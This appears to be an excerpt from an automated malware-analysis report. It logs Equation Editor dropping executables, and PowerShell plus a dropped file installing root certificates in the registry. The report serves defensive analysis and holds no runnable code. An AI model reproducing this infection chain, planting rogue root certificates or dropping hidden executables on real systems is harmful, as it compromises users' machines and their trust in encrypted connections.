Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 2B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 570000 memory reserve \| memory write watch	Jump to behavior
